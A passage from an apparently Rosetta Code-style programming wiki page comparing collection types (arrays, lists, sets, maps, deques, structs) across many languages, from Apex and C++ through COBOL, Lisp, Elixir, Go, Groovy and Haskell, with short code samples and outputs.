colors = new String[1]; colors[0] = 'Green'; Sets[edit] A set is an unordered collection of elements that do not contain any duplicates. Defining a set: Set<String> s1 = new Set<String>{'a', 'b + c'}; // Defines a new set with two elements Set<String> s2 = new Set<String>(s1); // Defines a new set that contains the // elements of the set created in the previous step Access elements in a set: Set<Integer> s = new Set<Integer>(); // Define a new set s.add(1); // Add an element to the set System.assert(s.contains(1)); // Assert that the set contains an element s.remove(1); // Remove the element from the set Note the following limitations on sets: - Unlike Java, Apex developers do not need to reference the algorithm that is used to implement a set in their declarations (for example, HashSet or TreeSet). Apex uses a hash structure for all sets. - A set is an unordered collection—you can’t access a set element at a specific index. You can only iterate over set elements. - The iteration order of set elements is deterministic, so you can rely on the order being the same in each subsequent execution of the same code. Maps[edit] A map is a collection of key-value pairs where each unique key maps to a single value Declaring a map: Map<String, String> country_currencies = new Map<String, String>(); Map<ID, Set<String>> m = new Map<ID, Set<String>>(); Map<String, String> MyStrings = new Map<String, String>{'a' => 'b', 'c' => 'd'.toUpperCase()}; Accessing a Map: Map<Integer, String> m = new Map<Integer, String>(); // Define a new map m.put(1, 'First entry'); // Insert a new key-value pair in the map m.put(2, 'Second entry'); // Insert a new key-value pair in the map System.assert(m.containsKey(1)); // Assert that the map contains a key String value = m.get(2); // Retrieve a value, given a particular key System.assertEquals('Second entry', value); Set<Integer> s = m.keySet(); // Return a set that contains all of the keys in the map Map Considerations: - Unlike Java, Apex developers do not need to reference the algorithm that is used to implement a map in their declarations (for example, HashMap or TreeMap). Apex uses a hash structure for all maps. - The iteration order of map elements is deterministic. You can rely on the order being the same in each subsequent execution of the same code. However, we recommend to always access map elements by key. - A map key can hold. - Uniqueness of map keys of user-defined types is determined by the equals and hashCode methods, which you provide in your classes. Uniqueness of keys of all other non-primitive types, such as sObject keys, is determined by comparing the objects’ field values. - A Map object is serializable into JSON only if it uses one of the following data types as a key. Boolean, Date, DateTime, Decimal, Double, Enum, Id, Integer, Long, String, Time AutoHotkey[edit] Objects[edit] myCol := Object() mycol.mykey := "my value!" mycol["mykey"] := "new val!" MsgBox % mycol.mykey ; new val Pseudo-arrays[edit] Documentation: Loop 3 array%A_Index% := A_Index * 9 MsgBox % array1 " " array2 " " array3 ; 9 18 27 Structs[edit] Structs are not natively supported in AutoHotkey, however they are often required in DllCalls to C++ Dlls. This shows how to retrieve values from a RECT structure in AutoHotkey (from the DllCall documentation at)) AWK[edit] In awk, the closest thing to collections would be arrays. They are created when needed at assignment a[0]="hello" or by splitting a string split("one two three",a) Single elements are accessible with the bracket notation, like in C: print a[0] One can iterate over the elements of an array: for(i in a) print i":"a[i] Axe[edit] 1→{L₁} 2→{L₁+1} 3→{L₁+2} 4→{L₁+3} Disp {L₁}►Dec,i Disp {L₁+1}►Dec,i Disp {L₁+2}►Dec,i Disp {L₁+3}►Dec,i BBC BASIC[edit] Arrays[edit] In BBC BASIC the only native type of 'collection' is the array; the index starts at zero and the subscript specified in the DIM is the highest value of the index. Hence in this example an array with two elements is defined: DIM text$(1) text$(0) = "Hello " text$(1) = "world!" Arrays of structures[edit] When the objects in the collection are not simple scalar types an array of structures may be used: DIM collection{(1) name$, year%} collection{(0)}.name$ = "Richard" collection{(0)}.year% = 1952 collection{(1)}.name$ = "Sue" collection{(1)}.year% = 1950 Linked lists[edit] Although not a native language feature, other types of collections such as linked lists may be constructed: DIM node{name$, year%, link%} list% = 0 PROCadd(list%, node{}, "Richard", 1952) PROCadd(list%, node{}, "Sue", 1950) PROClist(list%, node{}) END DEF PROCadd(RETURN l%, c{}, n$, y%) LOCAL p% DIM p% DIM(c{})-1 !(^c{}+4) = p% c.name$ = n$ c.year% = y% c.link% = l% l% = p% ENDPROC DEF PROClist(l%, c{}) WHILE l% !(^c{}+4) = l% PRINT c.name$, c.year% l% = c.link% ENDWHILE ENDPROC bc[edit] See Arrays for basic operations on arrays, the only collection type in bc. C[edit] See Also foreach One thing in C language proper that can be said to be a collection is array type. An array has a length known at compile time. #define cSize( a ) ( sizeof(a)/sizeof(a[0]) ) /* a.size() */ int ar[10]; /* Collection<Integer> ar = new ArrayList<Integer>(10); */ ar[0] = 1; /* ar.set(0, 1); */ ar[1] = 2; int* p; /* Iterator<Integer> p; Integer pValue; */ for (p=ar; /* for( p = ar.itereator(), pValue=p.next(); */ p<(ar+cSize(ar)); /* p.hasNext(); */ p++) { /* pValue=p.next() ) { */ printf("%d\n",*p); /* System.out.println(pValue); */ } /* } */ Please note that c built-in pointer-arithmetic support which helps this logic. An integer may be 4 bytes, and a char 1 byte: the plus operator (+) is overloaded to multiply a incement by 4 for integer pointers and by 1 for char pointers (etc). Another construct which can be seen as a collection is a malloced array. The size of a malloced array is not known at compile time. int* ar; /* Collection<Integer> ar; */ int arSize; arSize = (rand() % 6) + 1; ar = calloc(arSize, sizeof(int) ); /* ar = new ArrayList<Integer>(arSize); */ ar[0] = 1; /* ar.set(0, 1); */ int* p; /* Iterator<Integer> p; Integer pValue; */ for (p=ar; /* p=ar.itereator(); for( pValue=p.next(); */ p<(ar+arSize); /* p.hasNext(); */ p++) { /* pValue=p.next() ) { */ printf("%d\n",*p); /* System.out.println(pValue); */ } /* } */ A string is another C language construct (when looked at with its standard libraries) that behaves like a collection. A C language string is an array of char, and it's size may or may not be known at compile time, however a c string is terminated with a ASCII NUL (which may be stated as a constant, '\0' or ((char)0) in the C language). The String standard library "class" has many "methods", however instead of being called String.method(), they are usually called strmethod(). Arbitrarily complex data structures can be constructed, normally via language features struct and pointers. They are everywhere, but not provided by the C language itself per se. C++[edit] C++ has a range of different collections optimized for different use cases. Note that in C++, objects of user-defined types are mostly treated just like objects of built-in types; especially there's no different treatment for collections. Thus all collections can simply be demonstrated with the built-in type int. For user-defined types, just replace int with the user-defined type. Any type which goes into a collection must be copyable and assignable (which in general is automatically the case unless you explicitly disallow it). Note however that C++ collections store copies of the objects given to them, so you'll lose any polymorphic behaviour. If you need polymorphism, use a collection of pointers (or smart pointers like boost::shared_ptr). built-in array[edit] The simplest collection in C++ is the built-in array. Built-in arrays have a fixed size, and except for POD types (i.e. basically any type you culd also write in C), the members are all initialized at array creation time (if no explicit initialization is done, the default constructr is used). int a[5]; // array of 5 ints (since int is POD, the members are not initialized) a[0] = 1; // indexes start at 0 int primes[10] = { 2, 3, 5, 7, 11, 13, 17, 19, 23, 29 }; // arrays can be initialized on creation #include <string> std::string strings[4]; // std::string is no POD, therefore all array members are default-initialized // (for std::string this means initialized with empty strings) vector[edit] A vector is basically a resizable array. It is optimized for adding/removing elements on the end, and fast access to elements anywhere. Inserting elements at the beginning or in the middle is possible, but in general inefficient. #include <vector> std::vector<int> v; // empty vector v.push_back(5); // insert a 5 at the end v.insert(v.begin(), 7); // insert a 7 at the beginning deque[edit] A deque is optimized for appending and removing elements on both ends ofd the array. Accessing random elements is still efficient, but slightly less than with vector. #include <deque> std::deque<int> d; // empty deque d.push_back(5); // insert a 5 at the end d.push_front(7); // insert a 7 at the beginning d.insert(v.begin()+1, 6); // insert a 6 in the middle list[edit] A list is optimized for insertion at an arbitrary place (provided you already have an iterator pointing to that place). Element access is efficient only in linear order. #include <list> std::list<int> l; // empty list l.push_back(5); // insert a 5 at the end l.push_front(7); // insert a 7 at the beginning std::list::iterator i = l.begin(); ++l; l.insert(i, 6); // insert a 6 in the middle set[edit] A set keeps the inserted elements sorted, and also makes sure that each element occurs only once. Of course, if you want to put something into a set, it must be less-than-comparable, i.e. you must be able to compare which of two objects a and b is smaller using a<b (there's also a way to define sets with an user-defined order, in which case this restriction doesn't apply). #include <set> std::set<int> s; // empty set s.insert(5); // insert a 5 s.insert(7); // insert a 7 (automatically placed after the 5) s.insert(5); // try to insert another 5 (will not change the set) multiset[edit] A multiset is like a set, except the same element may occur multiple times. #include <multiset> std::multiset<int> m; // empty multiset m.insert(5); // insert a 5 m.insert(7); // insert a 7 (automatically placed after the 5) m.insert(5); // insert a second 5 (now m contains two 5s, followed by one 7) C#[edit] Arrays[edit] // Creates and initializes a new integer Array int[] intArray = new int[5] { 1, 2, 3, 4, 5 }; //same as int[] intArray = new int[]{ 1, 2, 3, 4, 5 }; //same as int[] intArray = { 1, 2, 3, 4, 5 }; //Arrays are zero-based string[] stringArr = new string[5]; stringArr[0] = "string"; ArrayList and List[edit] The size of ArrayList is dynamically increased as required. ArrayLists are zero-based. //Create and initialize ArrayList ArrayList myAl = new ArrayList { "Hello", "World", "!" }; //Create ArrayList and add some values ArrayList myAL = new ArrayList(); myAL.Add("Hello"); myAL.Add("World"); myAL.Add("!"); The List class is the generic equivalent of the ArrayList class. A List is a strongly typed list of objects that can be accessed by index ( zero-based again). //Create and initialize List List<string> myList = new List<string> { "Hello", "World", "!" }; //Create List and add some values List<string> myList2 = new List<string>(); myList2.Add("Hello"); myList2.Add("World"); myList2.Add("!"); Hashtable and Dictionary[edit] Hashtables represent a collection of key/value pairs that are organized based on the hash code of the key. Keys must be unique. //Create an initialize Hashtable Hashtable myHt = new Hashtable() { { "Hello", "World" }, { "Key", "Value" } }; //Create Hashtable and add some Key-Value pairs. Hashtable myHt2 = new Hashtable(); myHt2.Add("Hello", "World"); myHt2.Add("Key", "Value"); Dictionary is a generic class.It represents a collection of key/value pairs. Keys must be unique. //Create an initialize Dictionary Dictionary<string, string> dict = new Dictionary<string, string>() { { "Hello", "World" }, { "Key", "Value" } }; //Create Dictionary and add some Key-Value pairs. Dictionary<string, string> dict2 = new Dictionary<string, string>(); dict2.Add("Hello", "World"); dict2.Add("Key", "Value"); Clojure[edit] Clojure's collections are immutable: rather than modifying an existing collection, you create a new collection based on a previous one but with changes, for example an additional element. Hash maps[edit] {1 "a", "Q" 10} ; commas are treated as whitespace (hash-map 1 "a" "Q" 10) ; equivalent to the above (let [my-map {1 "a"}] (assoc my-map "Q" 10)) ; "adding" an element Lists[edit] '(1 4 7) ; a linked list (list 1 4 7) (cons 1 (cons 4 '(7))) Vectors[edit] ['a 4 11] ; somewhere between array and list (vector 'a 4 11) (cons ['a 4] 11) ; vectors add at the *end* Sets[edit] #{:pig :dog :bear} (assoc #{:pig :bear} :dog) (set [:pig :bear :dog]) COBOL[edit] COBOL is very much a fixed length programming environment. Hierarchical fixed length records are the main data grouping in many COBOL applications. Arrays are historically called tables in COBOL literature and are usually defined within a hierarchy. Tables are defined with the reserved word phrases OCCURS n TIMES, and OCCURS FROM n TO m TIMES DEPENDING ON x, (commonly referred to as ODO for short). This example shows a small record layout inside a very small table. The last line of the output sample is a debug enabled run-time bounds check abend, caused after the table is decreased in size. The first run, without bounds check, runs to an erroneous completion; the second, with debug enabled, does not. identification division. program-id. collections. data division. working-storage section. 01 sample-table. 05 sample-record occurs 1 to 3 times depending on the-index. 10 sample-alpha pic x(4). 10 filler pic x value ":". 10 sample-number pic 9(4). 10 filler pic x value space. 77 the-index usage index. procedure division. collections-main. set the-index to 3 move 1234 to sample-number(1) move "abcd" to sample-alpha(1) move "test" to sample-alpha(2) move 6789 to sample-number(3) move "wxyz" to sample-alpha(3) display "sample-table : " sample-table display "sample-number(1): " sample-number(1) display "sample-record(2): " sample-record(2) display "sample-number(3): " sample-number(3) *> abend: out of bounds subscript, -debug turns on bounds check set the-index down by 1 display "sample-table : " sample-table display "sample-number(3): " sample-number(3) goback. end program collections. - Output: prompt$ cobc -xj collections.cob sample-table : abcd:1234 test:0000 wxyz:6789 sample-number(1): 1234 sample-record(2): test:0000 sample-number(3): 6789 sample-table : abcd:1234 test:0000 sample-number(3): 6789 prompt$ cobc -xj -debug collections.cob sample-table : abcd:1234 test:0000 wxyz:6789 sample-number(1): 1234 sample-record(2): test:0000 sample-number(3): 6789 sample-table : abcd:1234 test:0000 collections.cob: 33: libcob: Subscript of 'sample-number' out of bounds: 3 Common Lisp[edit] hashing[edit] CL-USER> (let ((list '()) (hash-table (make-hash-table))) (push 1 list) (push 2 list) (push 3 list) (format t "~S~%" (reverse list)) (setf (gethash 'foo hash-table) 42) (setf (gethash 'bar hash-table) 69) (maphash (lambda (key value) (format t "~S => ~S~%" key value)) hash-table) ;; or print the hash-table in readable form ;; (inplementation-dependent) (write hash-table :readably t) ;; or describe it (describe hash-table) ;; describe the list as well (describe list)) ;; FORMAT on a list (1 2 3) ;; FORMAT on a hash-table FOO => 42 BAR => 69 ;; WRITE :readably t on a hash-table #.(SB-IMPL::%STUFF-HASH-TABLE (MAKE-HASH-TABLE :TEST 'EQL :SIZE '16 :REHASH-SIZE '1.5 :REHASH-THRESHOLD '1.0 :WEAKNESS 'NIL) '((BAR . 69) (FOO . 42))) ;; DESCRIBE on a hash-table #<HASH-TABLE :TEST EQL :COUNT 2 {1002B6F391}> [hash-table] Occupancy: 0.1 Rehash-threshold: 1.0 Rehash-size: 1.5 Size: 16 Synchronized: no ;; DESCRIBE on a list (3 2 1) [list] ; No value deque[edit] In Lisp, a deque can be represented using two list variables which are understood to be opposite to each other. That is to say, the list links (cons cell cdr pointers) go inward into the deque from both ends. For instance the deque (1 2 3 4 5 6) can be represented using (1 2 3) and (6 5 4). Then, it is easy to push items on either end using ordinary list push operations. Popping is also simple, except when the case occurs that either piece runs out of items. A Lisp macro can be provided which takes care of this situation. The implementation below handles the underflow in one deque piece by transferring about one half of the elements from the opposite piece. This keeps the amortized cost for pushes and pops O(1), and prevents the degenerate behavior of bouncing all the elements from one side to the other when pops are requested which alternate between the two ends of the deque. ;;; Obtained from Usenet, ;;; Message-ID: <[email protected]m> ;;; Posting by Kaz Kylheku, February 28, 2008. (eval-when (:compile-toplevel :load-toplevel :execute) (defun bisect-list (list &optional (minimum-length 0)) (do ((double-skipper (cddr list) (cddr double-skipper)) (single-skipper list (cdr single-skipper)) (length 2 (+ length (if (cdr double-skipper) 2 1)))) ((null double-skipper) (cond ((< length minimum-length) (values list nil)) ((consp single-skipper) (multiple-value-prog1 (values list (cdr single-skipper)) (setf (cdr single-skipper) nil))) (t (values list nil)))))) (defun pop-deque-helper (facing-piece other-piece) (if (null facing-piece) (multiple-value-bind (head tail) (bisect-list other-piece 10) (let ((remaining (if tail head)) (moved (nreverse (or tail head)))) (values (first moved) (rest moved) remaining))) (values (first facing-piece) (rest facing-piece) other-piece)))) (defmacro pop-deque (facing-piece other-piece) (let ((result (gensym)) (new-facing (gensym)) (new-other (gensym))) `(multiple-value-bind (,result ,new-facing ,new-other) (pop-deque-helper ,facing-piece ,other-piece) (psetf ,facing-piece ,new-facing ,other-piece ,new-other) ,result))) Demo: [1]> (defvar *front* nil) *FRONT* [2]> (defvar *back* nil) *BACK* [3]> (push 1 *front*) (1) [4]> (push 2 *front*) (2 1) [5]> (push 5 *back*) (5) [6]> (push 6 *back*) (6 5) [7]> (append *front* (reverse *back*)) ;; display the deque! (2 1 5 6) [8]> (pop-deque *front* *back*) 2 [9]> (append *front* (reverse *back*)) ;; display the deque! (1 5 6) [10]> (pop-deque *back* *front*) 6 [11]> (append *front* (reverse *back*)) ;; display the deque! (1 5) [12]> (pop-deque *back* *front*) 5 [13]> (append *front* (reverse *back*)) ;; display the deque! (1) [14]> *front* (1) [15]> *back* NIL [16]> (pop-deque *back* *front*) 1 [17]> *front* NIL [18]> *back* NIL D[edit] D has static arrays. int[3] array; array[0] = 5; // array.length = 4; // compile-time error D has dynamic arrays. int[] array; array ~= 5; // append 5 array.length = 3; array[3] = 17; // runtime error: out of bounds. check removed in release mode. array = [2, 17, 3]; writefln(array.sort); // 2, 3, 17 D has associative arrays. int[int] array; // array ~= 5; // it doesn't work that way! array[5] = 17; array[6] = 20; // prints "[5, 6]" -> "[17, 20]" - although the order is not specified. writefln(array.keys, " -> ", array.values); assert(5 in array); // returns a pointer, by the way if (auto ptr = 6 in array) writefln(*ptr); // 20 E[edit] E has both mutable and immutable builtin collections; the common types are list (array), map (hash table), and set (hash table). This interactive session shows mutable lists and immutable collections of all three types. See also Arrays#E. ? def constList := [1,2,3,4,5] # value: [1, 2, 3, 4, 5] ? constList.with(6) # value: [1, 2, 3, 4, 5, 6] ? def flexList := constList.diverge() # value: [1, 2, 3, 4, 5].diverge() ? flexList.push(6) ? flexList # value: [1, 2, 3, 4, 5, 6].diverge() ? constList # value: [1, 2, 3, 4, 5] ? def constMap := [1 => 2, 3 => 4] # value: [1 => 2, 3 => 4] ? constMap[1] # value: 2 ? def constSet := [1, 2, 3, 2].asSet() # value: [1, 2, 3].asSet() ? constSet.contains(3) # value: true EchoLisp[edit] The collection will be a list, which is not unusual in EchoLisp. We add items - symbols - to the collection, and save it to local storage. (define my-collection ' ( 🌱 ☀️ ☔️ )) (set! my-collection (cons '🎥 my-collection)) (set! my-collection (cons '🐧 my-collection)) my-collection → (🐧 🎥 🌱 ☀️ ☔️) ;; save it (local-put 'my-collection) → my-collection Elena[edit] ELENA 3.4: Arrays[edit] // Constant array var intArray := (1, 2, 3, 4, 5). // Generic array var stringArr := Array new:5. stringArr[0] := "string". // Typified array Array<literal> arr := V<literal>(5). arr[0] := "a". arr[1] := "b". ArrayList and List[edit] //Create and initialize ArrayList var myAl := system'collections'ArrayList new; append:"Hello"; append:"World"; append:"!". //Create and initialize List var myList := system'collections'List new; append:"Hello"; append:"World"; append:"!". Dictionary[edit] //Create a dictionary var dict := system'collections'Dictionary new. dict["Hello"] := "World". dict["Key"] := "Value". Elixir[edit] Elixir data types are immutable. The data contents aren't changed but can get changed new data. Indexes start from zero ( It is different from Erlang ). List[edit] Elixir uses square brackets to specify a list of values. Values can be of any type: empty_list = [] list = [1,2,3,4,5] length(list) #=> 5 [0 | list] #=> [0,1,2,3,4,5] hd(list) #=> 1 tl(list) #=> [2,3,4,5] Enum.at(list,3) #=> 4 list ++ [6,7] #=> [1,2,3,4,5,6,7] list -- [4,2] #=> [1,3,5] Tuple[edit] Elixir uses curly brackets to define tuples. Like lists, tuples can hold any value: Tuples store elements contiguously in memory. This means accessing a tuple element per index or getting the tuple size is a fast operation: empty_tuple = {} #=> {} tuple = {0,1,2,3,4} #=> {0, 1, 2, 3, 4} tuple_size(tuple) #=> 5 elem(tuple, 2) #=> 2 put_elem(tuple,3,:atom) #=> {0, 1, 2, :atom, 4} Keyword lists[edit] In Elixir, when we have a list of tuples and the first item of the tuple (i.e. the key) is an atom, we call it a keyword list: list = [{:a,1},{:b,2}] #=> [a: 1, b: 2] list == [a: 1, b: 2] #=> true list[:a] #=> 1 list ++ [c: 3, a: 5] #=> [a: 1, b: 2, c: 3, a: 5] Keyword lists are important because they have two special characteristics: - They keep the keys ordered, as specified by the developer. - They allow a key to be given more than once. Map[edit] Whenever you need a key-value store, maps are the “go to” data structure in Elixir. Compared to keyword lists, we can already see two differences: - Maps allow any value as a key. - Maps' keys do not follow any ordering. empty_map = Map.new #=> %{} kwlist = [x: 1, y: 2] # Key Word List Map.new(kwlist) #=> %{x: 1, y: 2} Map.new([{1,"A"}, {2,"B"}]) #=> %{1 => "A", 2 => "B"} map = %{:a => 1, 2 => :b} #=> %{2 => :b, :a => 1} map[:a] #=> 1 map[2] #=> :b # If you pass duplicate keys when creating a map, the last one wins: %{1 => 1, 1 => 2} #=> %{1 => 2} # When all the keys in a map are atoms, you can use the keyword syntax for convenience: map = %{:a => 1, :b => 2} #=> %{a: 1, b: 2} map.a #=> 1 %{map | :a => 2} #=> %{a: 2, b: 2} update only Set[edit] empty_set = MapSet.new #=> #MapSet<[]> set1 = MapSet.new(1..4) #=> #MapSet<[1, 2, 3, 4]> MapSet.size(set1) #=> 4 MapSet.member?(set1,3) #=> true MapSet.put(set1,9) #=> #MapSet<[1, 2, 3, 4, 9]> set2 = MapSet.new([6,4,2,0]) #=> #MapSet<[0, 2, 4, 6]> MapSet.union(set1,set2) #=> #MapSet<[0, 1, 2, 3, 4, 6]> MapSet.intersection(set1,set2) #=> #MapSet<[2, 4]> MapSet.difference(set1,set2) #=> #MapSet<[1, 3]> MapSet.subset?(set1,set2) #=> false Struct[edit] Structs are extensions built on top of maps that provide compile-time checks and default values. defmodule User do defstruct name: "john", age: 27 end john = %User{} #=> %User{age: 27, name: "john"} john.name #=> "john" %User{age: age} = john # pattern matching age #=> 27 meg = %User{name: "meg"} #=> %User{age: 27, name: "meg"} is_map(meg) #=> true Fancy[edit] array[edit] # creating an empty array and adding values a = [] # => [] a[0]: 1 # => [1] a[3]: 2 # => [1, nil, nil, 2] # creating an array with the constructor a = Array new # => [] hash[edit] # creating an empty hash h = <[]> # => <[]> h["a"]: 1 # => <["a" => 1]> h["test"]: 2.4 # => <["a" => 1, "test" => 2.4]> h[3]: "Hello" # => <["a" => 1, "test" => 2.4, 3 => "Hello"]> # creating a hash with the constructor h = Hash new # => <[]> Forth[edit] Array[edit] include ffl/car.fs 10 car-create ar \ create a dynamic array with initial size 10 2 0 ar car-set \ ar[0] = 2 3 1 ar car-set \ ar[1] = 3 1 0 ar car-insert \ ar[0] = 1 ar[1] = 2 ar[2] = 3 Double linked list[edit] include ffl/dcl.fs dcl-create dl \ create a double linked list 3 dl dcl-append 1 dl dcl-prepend 2 1 dl dcl-insert \ dl[0] = 1 dl[1] = 2 dl[2] = 3 Hashtable[edit] include ffl/hct.fs 10 hct-create ht \ create a hashtable with initial size 10 1 s" one" ht hct-insert \ ht["one"] = 1 2 s" two" ht hct-insert \ ht["two"] = 2 3 s" three" ht hct-insert \ ht["three"] = 3 Fortran[edit] Standard[edit]The only facility for a collection more organised than a collection of separately-named variables (even if with a system for the names) is the array, which is a collection of items of identical type, indexed by an integer only, definitely not by a text as in say Snobol. Thus REAL A(36) !Declares a one-dimensional array A(1), A(2), ... A(36)With F90 came a large expansion in the facilities for manipulating arrays. They can now have any lower bound, as in A(1) = 1 !Assigns a value to the first element. A(2) = 3*A(1) + 5 !The second element gets 8. REAL A(-6:+12)and their size can be defined at run time, not just compile time. Further, programmer-defined data aggregates can be defined via the TYPE statement, and arrays of such types can be manipulated. However, type-matching remains rigid: all elements of an array must be of the same type. So, TYPE(MIXED) !Name the "type". INTEGER COUNTER !Its content is listed. REAL WEIGHT,DEPTH CHARACTER*28 MARKNAME COMPLEX PATH(6) !The mixed collection includes an array. END TYPE MIXED TYPE(MIXED) TEMP,A(6) !Declare some items of that type. would define a collection of variables constituting a "type", then a simple variable TEMP whose parts would be accessed via the likes of TEMP.DEPTH or TEMP%DEPTH, and an array of such aggregates where A(3).PATH(1) = (2.7,3.1) assigns a complex number to the first step of the PATH of the third element of array A. The indexing must be associated with the item having an array aspect, but in pl/i A.PATH(3,1) - or other groupings - would be acceptable. There is a sense in which the CHARACTER type is flexible, in that multiple and different types can be represented as texts so that "Pi, 3.14159, 4*atan(1)" might be considered a collection of three items (yet be contained in one, possibly large variable) and be processed in various ways, or one might prepare a battery of variables and arrays referring to each other and disc files in such a way as to present a database containing a collection of information. Coarray[edit] Fortran normally uses only ( ) with no appeal to {[ ]} usage even for complex formulae. The co-array concept of the 1990s that was standardised in F2008 extends the syntax to use [k] to specify the k'th "image" executing in parallel. Loosely, if X is a variable, manipulated as in normal statements, a reference to X[3] would be to that X value held by the third running "image", while X would be in each image a reference to that image's own X value. In other words, there is a collection of X variables. FreeBASIC[edit] Although it's possible to build any type of collection (vectors, linked lists, stacks, queues, hashtables etc.) using FreeBASIC's object oriented features, the only collection type which is built into the language is the array. This can be fixed size or dynamic, have arbitrary lower and upper bounds, have up to 8 dimensions and any kind of element type (including user defined types). Here are some simple examples: ' FB 1.05.0 Win64 'create fixed size array of integers Dim a(1 To 5) As Integer = {1, 2, 3, 4, 5} Print a(2), a(4) 'create empty dynamic array of doubles Dim b() As Double ' add two elements by first redimensioning the array to hold this number of elements Redim b(0 To 1) b(0) = 3.5 : b(1) = 7.1 Print b(0), b(1) 'create 2 dimensional fixed size array of bytes Dim c(1 To 2, 1 To 2) As Byte = {{1, 2}, {3, 4}} Print c(1, 1), c(2,2) Sleep - Output: 2 4 3.5 7.1 1 4 Gambas[edit] Click this link to run this code Public Sub Main() Dim siCount As Short Dim cCollection As Collection = ["0": "zero", "1": "one", "2": "two", "3": "three", "4": "four", "5": "five", "6": "six", "7": "seven", "8": "eight", "9": "nine"] For siCount = 0 To 9 Print cCollection[Str(siCount)] End Output: zero one two three four five six seven eight nine Go[edit] Built in, resizable[edit] - Slices - Maps Built in resizable collections are slices and maps. The value type for these collections can be any Go type, including interface. An empty interface can reference an object of any type, providing a kind of polymorphic collection. Here the variable a is a slice of interface{} objects. package main import "fmt" func main() { var a []interface{} a = append(a, 3) a = append(a, "apples", "oranges") fmt.Println(a) } - Output: [3 apples oranges] Built in, less conventional[edit] - Go has arrays that can be used as collections, but arrays are declared with constant size and cannot be resized. - Strings are a special case of slice. Strings are immutable and are handled specially in other ways. - A struct with a number of members might be considered a collection in some sense. - A buffered channel might be closer to the familiar concept of a collection, as it represents a FIFO queue. Buffered channels have a fixed size and cannot be resized after creation. Library[edit] - The container directory of the standard library has the packages heap, list, and ring. - Anything that implements bufio.ReadWriter can be used as a FIFO queue. This includes bytes.Buffer, which makes a useful in-memory collection. - The sort package also contains search functions which perform a binary search on a sorted collection. For these functions the collection implementation is abstracted through sort.Interface. It is typically a slice, but could be anything that is indexable with an integer index. Groovy[edit] Lists are just variable-length, integer-indexed arrays. def emptyList = [] assert emptyList.isEmpty() : "These are not the items you're looking for" assert emptyList.size() == 0 : "Empty list has size 0" assert ! emptyList : "Empty list evaluates as boolean 'false'" def initializedList = [ 1, "b", java.awt.Color.BLUE ] assert initializedList.size() == 3 assert initializedList : "Non-empty list evaluates as boolean 'true'" assert initializedList[2] == java.awt.Color.BLUE : "referencing a single element (zero-based indexing)" assert initializedList[-1] == java.awt.Color.BLUE : "referencing a single element (reverse indexing of last element)" def combinedList = initializedList + [ "more stuff", "even more stuff" ] assert combinedList.size() == 5 assert combinedList[1..3] == ["b", java.awt.Color.BLUE, "more stuff"] : "referencing a range of elements" combinedList << "even more stuff" assert combinedList.size() == 6 assert combinedList[-1..-3] == \ ["even more stuff", "even more stuff", "more stuff"] \ : "reverse referencing last 3 elements" println ([combinedList: combinedList]) - Output: [combinedList:[1, b, java.awt.Color[r=0,g=0,b=255], more stuff, even more stuff, even more stuff]] Maps are just variable-length, associative arrays. They are not necessarily order preserving. def emptyMap = [:] assert emptyMap.isEmpty() : "These are not the items you're looking for" assert emptyMap.size() == 0 : "Empty map has size 0" assert ! emptyMap : "Empty map evaluates as boolean 'false'" def initializedMap = [ count: 1, initial: "B", eyes: java.awt.Color.BLUE ] assert initializedMap.size() == 3 assert initializedMap : "Non-empty map evaluates as boolean 'true'" assert initializedMap["eyes"] == java.awt.Color.BLUE : "referencing a single element (array syntax)" assert initializedMap.eyes == java.awt.Color.BLUE : "referencing a single element (member syntax)" assert initializedMap.height == null : \ "references to non-existant keys generally evaluate to null (implementation dependent)" def combinedMap = initializedMap \ + [hair: java.awt.Color.BLACK, birthdate: Date.parse("yyyy-MM-dd", "1960-05-17") ] assert combinedMap.size() == 5 combinedMap["weight"] = 185 // array syntax combinedMap.lastName = "Smith" // member syntax combinedMap << [firstName: "Joe"] // entry syntax assert combinedMap.size() == 8 assert combinedMap.keySet().containsAll( ["lastName", "count", "eyes", "hair", "weight", "initial", "firstName", "birthdate"]) println ([combinedMap: combinedMap]) - Output: [combinedMap:[count:1, initial:B, eyes:java.awt.Color[r=0,g=0,b=255], hair:java.awt.Color[r=0,g=0,b=0], birthdate:Tue May 17 00:00:00 CDT 1960, weight:185, lastName:Smith, firstName:Joe]] Sets are unique, not indexed at all (contents can only be discovered by traversal), and are not necessarily order preserving. There is no particular special language support for denoting a Set, although a Set may be initialized from a List, and Sets share many of the same operations and methods that are available in Lists. def emptySet = new HashSet() assert emptySet.isEmpty() : "These are not the items you're looking for" assert emptySet.size() == 0 : "Empty set has size 0" assert ! emptySet : "Empty set evaluates as boolean 'false'" def initializedSet = new HashSet([ 1, "b", java.awt.Color.BLUE ]) assert initializedSet.size() == 3 assert initializedSet : "Non-empty list evaluates as boolean 'true'" //assert initializedSet[2] == java.awt.Color.BLUE // SYNTAX ERROR!!! No indexing of set elements! def combinedSet = initializedSet + new HashSet([ "more stuff", "even more stuff" ]) assert combinedSet.size() == 5 combinedSet << "even more stuff" assert combinedSet.size() == 5 : "No duplicate elements allowed!" println ([combinedSet: combinedSet]) - Output: [combinedSet:[1, java.awt.Color[r=0,g=0,b=255], b, even more stuff, more stuff]] Haskell[edit] Data.List[edit] The list is typically the first collection type to be encountered in textbooks, but other types may tend to be more efficient, or more flexibly accessed; see the Data hierarchy of GHC's standard library. New collection types may be defined with data. [1, 2, 3, 4, 5] To prepend a single element to a list, use the : operator: 1 : [2, 3, 4] To concatenate two lists, use ++: [1, 2] ++ [3, 4] To concatenate a whole list of lists, use concat: concat [[1, 2], [3, 4], [5, 6, 7]] Data.Array[edit] Faster retrieval by index: import Data.Array (Array, listArray, Ix, (!)) triples :: Array Int (Char, String, String) triples = listArray (0, 11) $ zip3 "鼠牛虎兔龍蛇馬羊猴鸡狗豬" -- 生肖 shengxiao – symbolic animals (words "shǔ niú hǔ tù lóng shé mǎ yáng hóu jī gǒu zhū") (words "rat ox tiger rabbit dragon snake horse goat monkey rooster dog pig") indexedItem :: Ix i => Array i (Char, String, String) -> i -> String indexedItem a n = let (c, w, w1) = a ! n in c : unwords ["\t", w, w1] main :: IO () main = (putStrLn . unlines) $ indexedItem triples <$> [2, 4, 6] - Output: 虎 hǔ tiger 龍 lóng dragon 馬 mǎ horse Data.Map[edit] Flexible key-value indexing and efficient retrieval: import qualified Data.Map as M import Data.Maybe (isJust) mapSample :: M.Map String Int mapSample = M.fromList [ ("alpha", 1) , ("beta", 2) , ("gamma", 3) , ("delta", 4) , ("epsilon", 5) , ("zeta", 6) ] maybeValue :: String -> Maybe Int maybeValue = flip M.lookup mapSample main :: IO () main = print $ sequence $ filter isJust (maybeValue <$> 